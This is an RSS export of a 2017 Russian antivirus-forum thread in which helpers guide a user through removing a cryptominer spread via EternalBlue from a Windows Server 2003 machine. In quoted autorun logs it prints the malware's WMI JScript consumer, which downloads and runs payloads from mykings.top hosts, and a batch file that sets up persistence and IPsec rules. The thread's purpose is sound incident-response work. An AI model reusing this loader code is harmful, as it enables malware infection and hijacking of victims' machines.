Форум esetnod32.ru [тема: Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;] http://forum.esetnod32.ru Новое в теме Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; форума на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Wed, 29 Apr 2026 20:21:26 +0300 Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
santy написал:
файл c2.bat как раз нам интересен
=============

Вчера подобный файл внесли в базу как угрозу... :)
13.06.2017 11:53:38, Дмитрий.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99464/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99464/ Tue, 13 Jun 2017 11:53:38 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
скрипт надо выполнить обязательно, потому что он очищает левый обработчик событий WMI.

этот обработчик и добавляет вам в систему вредоносные файлы из сети, которые пока гасятся антивирусом.


====quote====
Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name fuckyoumm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name fuckyoumm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "fuckyoumm2_filter";
Query = "select * from __timerevent where timerid="fuckyoumm2_itimer"";
QueryLanguage = "wql";
};
=============

через этот обработчик выполняется попытка установить в систему майнер криптовалюты.
13.06.2017 10:21:48, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99463/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99463/ Tue, 13 Jun 2017 10:21:48 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Нет, не выполнил. Т.к. смогу это сделать только ночью, когда все будут отключены от сервера.
Файл тоже постараюсь сегодня поймать.  
13.06.2017 10:12:51, Андрей Пахомов.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99462/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99462/ Tue, 13 Jun 2017 10:12:51 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
скрипт в uVS выполнили?

файл c2.bat как раз нам интересен, потому что в образ он (список команд бат файла) попадает не полностью.
13.06.2017 09:47:43, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99460/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99460/ Tue, 13 Jun 2017 09:47:43 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Политики, задания и пр. поудалял.
Проверяю сейчас антимэйлваром.
Файл архивировать и отправлять пока не буду,
Нод успешно его на подлёте сносит.
Винду пропатчил, буду наблюдать.
Спасибо всем за помощь!  
13.06.2017 09:39:14, Андрей Пахомов.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99459/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99459/ Tue, 13 Jun 2017 09:39:14 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Андрей Пахомов,
вам необходимо пропатчить систему, чтобы после ее очистки она опять же не подверглась атаке


====quote====
Требуется установка обновления KB4012598, если у вас следующие операционные системы:

   Windows 8, Windows XP SP3, Windows XP SP2 64-bit, Windows Server 2008 for Itanium-based Systems, Windows Vista, Windows Server 2008, Windows XP Embedded, Windows Server 2003, Windows Server 2003 Datacenter Edition.
=============

https://www.comss.ru/download/page.php?id=4016

для вашей системы

Microsoft Windows Server 2003 R2 x86 (NT v5.2 SP2) build 3790 Service Pack 2 [C:\WINDOWS]

патч MS-2017-010 скачать отсюда:

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
09.06.2017 19:53:50, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99406/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99406/ Fri, 09 Jun 2017 19:53:50 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Работают люди :)  ;)
09.06.2017 19:38:09, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99405/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99405/ Fri, 09 Jun 2017 19:38:09 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Это похоже на Adylkuzz, судя по тому что закрывается доступ к указанным портам.


====quote====

Попав на компьютер жертвы Adylkuzz сканирует компьютер на наличие своих же копий, завершает их, блокирует SMB-коммуникации, определяет публичный IP-адрес жертвы, загружает инструкции и криптомайнер. Похоже, существует несколько серверов управления вирусом, откуда он загружает инструкции и необходимые модули.

Интересен ещё и такой факт: попадая на компьютер жертвы, Adylkuzz как бы закрывает дверь изнутри и вирус WannaCry просто не может на него проникнуть. То есть распространение одного вируса, способствовало подавлению эпидемии распространения другого.
=============

https://habrahabr.ru/post/328932/


====quote====
On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry.

Over the subsequent weekend, however, we discovered another very large-scale attack using both EternalBlue and DoublePulsar to install the cryptocurrency miner Adylkuzz. Initial statistics suggest that this attack may be larger in scale than WannaCry: because this attack shuts down SMB networking to prevent further infections with other malware (including the WannaCry worm) via that same vulnerability, it may have in fact limited the spread of last week’s WannaCry infection.

=============

Однако в последующие выходные мы обнаружили еще одну очень крупную атаку с использованием как EternalBlue, так и DoublePulsar для установки майнера криптовалюты Adylkuzz. Первоначальная статистика показывает, что эта атака может быть больше по масштабу, чем WannaCry: поскольку эта атака отключает SMB-сеть, чтобы предотвратить дальнейшие заражения другими вредоносными программами (включая червя WannaCry) с помощью той же уязвимости, возможно, это ограничило распространение на прошлой неделе Инфекция WannaCry.

https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar
09.06.2017 19:27:37, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99404/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99404/ Fri, 09 Jun 2017 19:27:37 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Андрей Пахомов

Там ещё файлик.

C:\WINDOWS\DEBUG\C2.BAT

Его нужно удалить.
09.06.2017 18:51:09, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99403/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99403/ Fri, 09 Jun 2017 18:51:09 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
+
проверьте,
кем создана эта политика безопасности ipsec,
Active IPSec Policy [Local]: SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{66ff4bd3-c14c-41bb-8f5b-2f23f3ccf97d}
если не вами, то  ее лучше отключить.
------------
судя по содержимому c2.bat таки политика ipsec создана зловредом.
заархивируйте этот файл с паролем infected и вышлите в почту safety@chklst.ru
C:\WINDOWS\DEBUG\C2.BAT


====quote====
ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.ex
=============

09.06.2017 15:33:46, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99401/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99401/ Fri, 09 Jun 2017 15:33:46 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
если же подобные угрозы фиксируются на других компутерах в локальной сети,
то добавляйте образы автозапуска по всем компам, где есть подобные логи в журнале угроз.
09.06.2017 15:29:14, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99400/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99400/ Fri, 09 Jun 2017 15:29:14 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
====code==== 

;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv5.2
v400c
OFFSGNSAVE
regt 35
;------------------------autoscript---------------------------

delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
apply

; Java(TM) 6 Update 22
exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216022FF} /quiet
deltmp
delref %Sys32%\BLANK.HTM
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\[CLSID]
delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {764BF0E1-F219-11CE-972D-00AA00A14F56}\[CLSID]
delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}\[CLSID]
delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}\[CLSID]
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_1AF_53.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.135\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.99\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_1A_E.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.57\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.25.5\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.23.9\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.27.5\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.26.9\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.69\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.149\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.145\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.2.183.39\GOOPDATE.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.115\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.79\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_25B_E.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.65\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.30.3\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.1\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.123\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.24.7\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_5_66.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.153\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.33.3\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.13\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.29.5\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.32.7\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.25.11\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.24.15\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.165\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.22.3\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.29.1\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.111\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.15\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.22.5\PSUSER.DLL
;-------------------------------------------------------------

restart
=============
перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/
09.06.2017 15:27:23, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99399/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99399/ Fri, 09 Jun 2017 15:27:23 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Вот ссылка на полный образ:

https://yadi.sk/d/8PzI8dmW3JyJxh
09.06.2017 15:23:00, Андрей Пахомов.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99398/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99398/ Fri, 09 Jun 2017 15:23:00 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
RP55,
подождем образ, из него будет все понятно.
09.06.2017 14:35:27, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99396/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99396/ Fri, 09 Jun 2017 14:35:27 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Судя по всему здесь должна быть запись в WMI
09.06.2017 13:41:13, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99393/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99393/ Fri, 09 Jun 2017 13:41:13 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Андрей,
добавьте образ автозапуска системы в uVS.
(инструкция как это сделать в моей подписи)
------
+
вопрос:
сервер 2003 доступен из внешней сети?
если да, то надо подумать о безопасности сервера, не ровен час и WannaCry может прилететь, если порты открыты во внешнюю сеть.
09.06.2017 11:27:19, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99392/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99392/ Fri, 09 Jun 2017 11:27:19 +0300 Обнаружение вредоносного кода и ложные срабатывания Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER в форуме Обнаружение вредоносного кода и ложные срабатывания.
Как видим, троян и процессы, её запускающие, не удаляются. В планировщике появилось 2 новых задания. В автозапуске 2 новых процесса. Как понял, троян появился только-только. Первые упоминания с 1 июня в сети. НОД пока что только обнаруживает и удаляет создаваемый исполняемый файл.

WinServ2003, NOD32 File Security

Скрытый текст

09.06.2017 11:19:02, Андрей Пахомов.]]> http://forum.esetnod32.ru/messages/forum6/topic14074/message99391/ http://forum.esetnod32.ru/messages/forum6/topic14074/message99391/ Fri, 09 Jun 2017 11:19:02 +0300 Обнаружение вредоносного кода и ложные срабатывания